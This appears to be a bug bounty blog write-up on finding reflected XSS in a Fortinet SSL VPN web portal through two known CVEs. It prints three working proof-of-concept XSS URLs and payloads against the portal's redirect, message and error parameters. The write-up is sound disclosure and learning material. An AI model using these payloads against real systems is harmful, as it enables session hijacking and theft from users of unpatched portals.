.png)
7 months ago
60 BOOK THIS SPACE FOR AD
ARTICLE AD
Hello everyone…
In this article i am going to tell you how i found Reflected XSS on a Public Bug Bounty Program.
CVSS Score: 5.4 — CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
XSS is a security vulnerability commonly found in web applications. XSS occurs when an attacker injects malicious scripts into web pages viewed by other users. These scripts can be executed in the context of a victim’s browser, allowing the attacker to steal information, hijack user sessions, or perform other malicious actions.
During the Bug Bounty assessment of the <target.com> domain, I have identified a reflected Cross-Site Scripting (XSS) web security vulnerability in one of the subdomains of it. Cross-Site Scripting (XSS) is a web security vulnerability which occurs when an attacker is able to inject malicious scripts, usually in the form of JavaScript code, into web pages viewed by other users. This vulnerability typically arises from inadequate input validation and output encoding practices in the application code.
During enumeration i noticed that Fortinet SSL VPN web portal is running on the affected url.
Then, Manually browsed the url and guessed from the url parameter looks like a Fortinet SSL VPN web portal in which most of the web content are removed to identify it easily.
In further enumeration and looked for known vulnerabilities which can be used to exploit this Fortinet SSL VPN web portal, I identified that this web portal is vulnerable to CVE-2017–14186 and CVE-2018–13380 in multiple parameters.
Then i tried to trigger the XSS in the affected URL against the above mentioned CVEs and it was successful.
https://<target.com>/remote/loginredir?redir=javascript:alert(document.domain)
Payload: javascript:alert(document.domain)
https://<target.com>/message?title=x&msg=%26%23%3Csvg/onload=alert(“XSS_Triggered”)
%3E%3B
Payload: %26%23%3Csvg/onload=alert(“XSS_Triggered”)
%3E%3B ==> &#<svg/onload=alert(“XSS_Triggered”)
>;
https://<target.com>/remote/error?errmsg=ABABAB — %3E%3Cscript%3Ealert(“XSS_Triggered”)%3C/script%3E ==> ABABAB-><script>alert(“XSS_Triggered”)</script>
Payload: ABABAB-><script>alert(“XSS_Triggered”)</script>
So that’s the way i find XSS and reported it to the Team.
That’s it guys…!!!!!! Hope you enjoyed this….
Happy Hunting ~~ Keep Learning !!
Support & follow guys……..!!! Thanks you all. 💻🔰💱
Bengali (Bangladesh) · 
English (United States) ·